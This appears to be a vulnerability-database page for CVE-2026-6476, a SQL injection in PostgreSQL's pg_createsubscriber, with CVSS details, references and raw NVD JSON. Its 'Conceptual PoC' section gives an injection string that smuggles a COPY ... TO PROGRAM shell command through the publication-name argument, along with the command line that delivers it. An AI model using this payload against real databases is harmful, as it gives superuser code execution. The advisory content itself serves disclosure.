CVE-2026-6476

Description

SQL injection in PostgreSQL pg_createsubscriber allows an attacker with pg_create_subscription rights to execute arbitrary SQL as a superuser. The attack takes effect when pg_createsubscriber next runs. Within major versions 17 and 18, minor versions before PostgreSQL 18.4 and 17.10 are affected. Versions before PostgreSQL 17 are unaffected.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

PostgreSQL 17 < 17.10

PostgreSQL 18 < 18.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Conceptual PoC for CVE-2026-6476
# The attacker needs pg_create_subscription privileges.
# The vulnerability triggers when pg_createsubscriber runs.

# 1. Attacker prepares malicious SQL payload
# This payload attempts to create a superuser or execute OS commands.
# Example payload injection into a vulnerable parameter (e.g., publication name).
MALICIOUS_PAYLOAD="'; COPY (SELECT '') TO PROGRAM 'touch /tmp/pwned'; --"

# 2. Execution scenario
# When an administrator or the system runs pg_createsubscriber with the crafted input:
# /usr/bin/pg_createsubscriber -d postgres -p 5432 -U attacker --publication="${MALICIOUS_PAYLOAD}"

# 3. Result
# The injected SQL is executed with superuser privileges, creating the file /tmp/pwned.
# This confirms arbitrary SQL execution capability.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-6476
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-6476
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-6476/
[4] VulDB https://vuldb.com/cve/CVE-2026-6476
[5] https://www.postgresql.org/support/security/CVE-2026-6476/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-6476", "sourceIdentifier": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "published": "2026-05-14T14:16:25.230", "lastModified": "2026-05-14T16:21:23.190", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQL injection in PostgreSQL pg_createsubscriber allows an attacker with pg_create_subscription rights to execute arbitrary SQL as a superuser.  The attack takes effect when pg_createsubscriber next runs.  Within major versions 17 and 18, minor versions before PostgreSQL 18.4 and 17.10 are affected.  Versions before PostgreSQL 17 are unaffected."}], "metrics": {"cvssMetricV31": [{"source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://www.postgresql.org/support/security/CVE-2026-6476/", "source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007"}]}}